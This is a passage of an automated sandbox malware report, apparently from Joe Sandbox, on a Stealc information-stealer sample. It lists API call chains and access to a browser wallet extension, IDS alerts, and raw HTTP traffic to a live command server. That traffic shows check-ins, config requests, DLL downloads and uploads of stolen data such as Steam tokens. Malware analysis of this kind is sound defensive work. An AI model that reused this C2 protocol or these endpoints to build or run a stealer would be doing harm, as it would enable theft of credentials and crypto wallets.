Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF3560 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00EF3560
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EEB630 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00EEB630
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EE1600 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00EE1600
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EEDB90 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00EEDB90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF2B70 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00EF2B70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EEE450 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00EEE450
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF31E0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00EF31E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EED570 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00EED570
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EF2630 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00EF2630
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\i3NmF0obCm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49730 -> 40.86.87.10:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49730 -> 40.86.87.10:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 40.86.87.10:80 -> 192.168.2.4:49730
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49730 -> 40.86.87.10:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 40.86.87.10:80 -> 192.168.2.4:49730
Source: Malware configuration extractor URLs: http://40.86.87.10/108e010e8f91c38c.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:02 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:07 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:08 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:10 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:11 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:13 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:14 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKEHost: 40.86.87.10Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="hwid"5B9C2214BD8B2768236643------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="build"ZOV------HDGIJJDGCBKFIDHIEBKE--
Source: global traffic HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJDGCGDAAAKECAKKJDAHost: 40.86.87.10Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------BKJDGCGDAAAKECAKKJDAContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------BKJDGCGDAAAKECAKKJDAContent-Disposition: form-data; name="message"browsers------BKJDGCGDAAAKECAKKJDA--
Source: global traffic HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCAHost: 40.86.87.10Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="message"plugins------AEBGHDBKEBGIDHJJEHCA--
Source: global traffic HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKFIJEGCAAFHJKFCFCHost: 40.86.87.10Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------AEBKFIJEGCAAFHJKFCFCContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------AEBKFIJEGCAAFHJKFCFCContent-Disposition: form-data; name="message"fplugins------AEBKFIJEGCAAFHJKFCFC--
Source: global traffic HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJDAAEGIDHDGCAAFCBAHost: 40.86.87.10Content-Length: 5935Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b13597c85f807692/sqlite3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAAHost: 40.86.87.10Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKEBGIIDAFIDHIIECFHost: 40.86.87.10Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJJEBFHDBGIECBFCBKJHost: 40.86.87.10Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="file"------IJJJEBFHDBGIECBFCBKJ--
Source: global traffic HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJKHost: 40.86.87.10Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="file"------GDGDHJJDGHCAAAKEHIJK--
Source: global traffic HTTP traffic detected: GET /b13597c85f807692/freebl3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b13597c85f807692/mozglue.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b13597c85f807692/msvcp140.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b13597c85f807692/nss3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b13597c85f807692/softokn3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b13597c85f807692/vcruntime140.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBFHost: 40.86.87.10Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCBKECAKFBGCAKECGIEHost: 40.86.87.10Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 2d 2d 0d 0a Data Ascii: ------DGCBKECAKFBGCAKECGIEContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------DGCBKECAKFBGCAKECGIEContent-Disposition: form-data; name="message"wallets------DGCBKECAKFBGCAKECGIE--
Source: global traffic HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJDGIJECGDHJJECGHHost: 40.86.87.10Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 2d 2d 0d 0a Data Ascii: ------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="message"files------JEGHJDGIJECGDHJJECGH--
Source: global traffic HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFHDBGHJKFIDHJJJEBKHost: 40.86.87.10Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 2d 2d 0d 0a Data Ascii: ------CAFHDBGHJKFIDHJJJEBKContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------CAFHDBGHJKFIDHJJJEBKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CAFHDBGHJKFIDHJJJEBKContent-Disposition: form-data; name="file"------CAFHDBGHJKFIDHJJJEBK--
Source: global traffic HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJECHost: 40.86.87.10Content-Length: 97855Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCAHost: 40.86.87.10Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 2d 2d 0d 0a Data Ascii: ------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="message"jbdtaijovg------AEBGHDBKEBGIDHJJEHCA--
Source: Joe Sandbox View ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: unknown TCP traffic detected without corresponding DNS query: 40.86.87.10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe Code function: 0_2_00EE4C90 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00EE4C90
Source: global traffic HTTP traffic detected: GET /b13597c85f807692/sqlite3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b13597c85f807692/freebl3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b13597c85f807692/mozglue.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b13597c85f807692/msvcp140.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b13597c85f807692/nss3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b13597c85f807692/softokn3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /b13597c85f807692/vcruntime140.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: unknown HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKEHost: 40.86.87.10Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 42 39 43 32 32 31 34 42 44 38 42 32 37 36 38 32 33 36 36 34 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 5a 4f 56 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 2d 2d 0d 0a Data Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="hwid"5B9C2214BD8B2768236643------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="build"ZOV------HDGIJJDGCBKFIDHIEBKE--
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php%
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php(
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php-LTC
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php2
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php9
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php976cbc684762e42ee25308426ba0ad93
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php:
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.phpI
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.phpe
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.phpirefox
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.phposition:
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.00000000013F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.phpv
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/108e010e8f91c38c.php~
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/b13597c85f807692/freebl3.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/b13597c85f807692/freebl3.dll$
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/b13597c85f807692/freebl3.dll:
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/b13597c85f807692/mozglue.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/b13597c85f807692/mozglue.dllL
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/b13597c85f807692/mozglue.dllv
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1880536045.0000000027931000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/b13597c85f807692/msvcp140.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/b13597c85f807692/nss3.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/b13597c85f807692/nss3.dllQ
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/b13597c85f807692/nss3.dllll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/b13597c85f807692/nss3.dllllU
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/b13597c85f807692/nss3.dllowser
Source: i3NmF0obCm.exe, 00000000.00000002.1880536045.0000000027931000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/b13597c85f807692/softokn3.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1880536045.0000000027931000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/b13597c85f807692/softokn3.dllJtx
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/b13597c85f807692/sqlite3.dll
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001365000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://40.86.87.10/b13597c85f807692/vcruntime140.dll
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
